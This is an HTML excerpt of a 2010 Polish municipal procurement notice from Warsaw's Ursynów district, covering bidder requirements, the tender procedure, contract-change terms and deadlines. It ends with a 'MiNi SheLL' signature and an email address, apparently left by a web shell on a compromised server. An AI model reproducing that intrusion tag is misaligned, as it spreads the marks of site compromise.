Pełnomocnictwo musi być podpisane przez wszystkich uprawnionych Wykonawców występujących wspólnie oraz dołączone w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez notariusza jako element składowy oferty.
UWAGA!
W przypadku spółki cywilnej, której wspólnicy traktowani są jako Wykonawcy ubiegający się wspólnie o zamówienie - zobligowani są załączyć powyżej wyszczególnione pełnomocnictwo. 
6. Jeżeli oferta oraz załączniki, oświadczenia i dokumenty zostaną podpisane przez osobę albo osoby działające na podstawie pełnomocnictwa, do oferty należy załączyć właściwe pełnomocnictwo w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez notariusza
7. W przypadku gdy wykonawca będzie polegał na wiedzy i doświadczeniu, osobach zdolnych do wykonania zamówienia innych podmiotów, zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W odniesieniu do art.144 ust.1 ustawy Prawo zamówień publicznych - Zamawiający zastrzega sobie możliwość zmiany warunków umowy na etapie jej realizacji w zakresie:
1) wynagrodzenia umownego: 

a)zgodnie z § 3 ust. 7 wzoru umowy Wysokość wynagrodzenia, o którym mowa w ust. 1, może ulec zmniejszeniu w następujących przypadkach:

- późniejszego przyjazdu lub wcześniejszego wyjazdu uczestnika, w takim przypadku Zamawiający zapłaci pełną stawkę ustaloną za osobodzień za faktycznie wykorzystane dni pobytu, a za dni nie wykorzystane, stawkę pomniejszoną o koszt wyżywienia tego uczestnika;

- zmiany liczby uczestników turnusów

b)  pod warunkiem, że zmiany te są korzystne dla Zamawiającego

2)  zmiany osób przewidzianych do realizacji umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ursynow.waw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację istotnych warunków zamówienia można uzyskać pod adresem: osobiście w siedzibie Zamawiającego przy Al. KEN 61 w Wydziale Zamówień Publicznych pok. nr 333..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.06.2010 godzina 10:30, miejsce: Siedziba Zamawiającego przy Al. KEN 61, Wydział Spraw Społecznych i Zdrowia pok. nr 448..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com